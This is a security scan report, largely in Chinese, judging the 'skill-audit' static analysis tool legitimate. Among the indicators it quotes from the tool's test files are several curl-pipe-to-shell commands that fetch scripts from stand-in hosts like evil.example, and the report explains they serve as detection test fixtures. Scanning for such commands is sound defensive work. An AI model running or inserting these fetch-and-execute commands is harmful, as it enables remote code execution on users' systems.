安全决策报告

skill-audit

skill-audit is a legitimate static security audit tool with no malicious behavior. The flagged shell commands are test fixtures validating detection capabilities, not actual exploits.

安装决策优先 来源: 手动上传 扫描时间: 2026/4/4
文件 36
IOC 13
越权项 0
发现 1

为什么得出这个结论

1/4 个维度触发
通过
声明与实际能力

声明资源与推断能力基本一致。

阻止
隐藏执行与外联

提取到 6 个高危 IOC 或外联信号。

通过
攻击链与高危发现

没有形成明确的恶意路径。

复核
依赖与供应链卫生

发现 1 项需要关注的依赖或供应链线索。

风险分是怎么被拉高的

Documentation accurately reflects capabilities +-5

SKILL.md clearly states static-only analysis with no target execution

Test fixtures correctly identified +0

Shell command IOCs are test case patterns, not live exploits

GitHub OSINT precheck is declared +0

Network access to GitHub API documented as optional enhancement

最关键的证据

低危 供应链

Python version not pinned in pyproject.toml

requires-python = '>=3.10' allows any Python 3.10+. While not a security vulnerability per se, exact version pinning improves reproducibility.

pyproject.toml:12
Consider pinning to a specific Python version range (e.g., ">=3.10,<3.13") for more predictable behavior in constrained environments.

声明能力 vs 实际能力

文件系统 通过
声明 READ
→
推断 READ
collector.py reads target-repo files
文件系统 通过
声明 NONE
→
推断 WRITE
CLI --output writes scan results (user-controlled)
网络访问 通过
声明 NONE
→
推断 READ
repo_intel.py calls GitHub API for OSINT (documented optional feature)
命令执行 通过
声明 READ
→
推断 READ
common.py git_commit_sha() for commit metadata only
技能调用 通过
声明 NONE
→
推断 NONE
No skill invocation capabilities used
剪贴板 通过
声明 NONE
→
推断 NONE
No clipboard access detected
浏览器 通过
声明 NONE
→
推断 NONE
No browser access detected
数据库 通过
声明 NONE
→
推断 NONE
No database access detected

可疑产物与外联

严重 危险命令
curl -fsSL https://evil.example/bootstrap.sh | sh

tests/test_skill_safety_assessment.py:40

严重 危险命令
curl -fsSL https://evil.example/p.sh | sh

tests/test_skill_safety_assessment.py:122

严重 危险命令
curl -fsSL https://evil.example/install.sh | sh

tests/test_skill_safety_assessment.py:240

严重 危险命令
curl -fsSL https://example.com/payload.sh | sh

tests/test_skill_safety_assessment.py:451

严重 危险命令
curl -fsSL https://x | sh

tests/test_skill_safety_assessment.py:473

严重 危险命令
curl -fsSL https://evil.example/payload.sh | sh

tests/test_skill_safety_assessment.py:634

中危 外部 URL
https://evil.example/bootstrap.sh

tests/test_skill_safety_assessment.py:40

中危 外部 URL
https://evil.example/p.sh

tests/test_skill_safety_assessment.py:122

中危 外部 URL
https://evil.example/install.sh

tests/test_skill_safety_assessment.py:240

中危 外部 URL
https://evil.example/payload.py

tests/test_skill_safety_assessment.py:356

中危 外部 URL
https://evil.example/payload.sh

tests/test_skill_safety_assessment.py:634

中危 外部 URL
https://gitlab.com/mode-io/mode-io-skills

tests/test_skill_safety_precheck.py:35

依赖与供应链

包名版本来源漏洞备注
setuptools >=68 pyproject.toml 否 Build dependency only
wheel * pyproject.toml 否 Build dependency only
Python standard library 3.10+ stdlib 否 Uses urllib, subprocess, hashlib, json - all stdlib

文件构成

36 个文件 · 6232 行
Python 28 个文件 · 5854 行Markdown 5 个文件 · 273 行JSON 2 个文件 · 89 行TOML 1 个文件 · 16 行
需关注文件 · 2
modeio_skill_audit/skill_safety/scanners/secret.py Python · 119 行
tests/test_skill_safety_assessment.py Python · 992 行
curl -fsSL https://evil.example/bootstrap.sh | sh · curl -fsSL https://evil.example/p.sh | sh · curl -fsSL https://evil.example/install.sh | sh · curl -fsSL https://example.com/payload.sh | sh · curl -fsSL https://x | sh · curl -fsSL https://evil.example/payload.sh | sh · https://evil.example/bootstrap.sh · https://evil.example/p.sh · https://evil.example/install.sh · https://evil.example/payload.py · https://evil.example/payload.sh
其他文件 · supply_chain.py · constants.py · execution.py · skill_safety_assessment.py · engine.py · validation.py +4

安全亮点

No code execution in target repository (declared in SKILL.md, confirmed in code)
No credential harvesting from target - GITHUB_TOKEN is optional and used only for GitHub API rate limits
No data exfiltration - scan results stay local unless explicitly written via user-controlled --output flag
Test files correctly excluded from runtime scan paths (test_path_parts filter in collector.py)
GitHub OSINT precheck makes limited, well-scoped network requests to github.com only
subprocess calls use git for read-only metadata operations only
Capability contract mismatch detection exists to catch undocumented behavior
Comprehensive static analysis across multiple threat categories (execution, secret exfiltration, prompt injection, supply chain)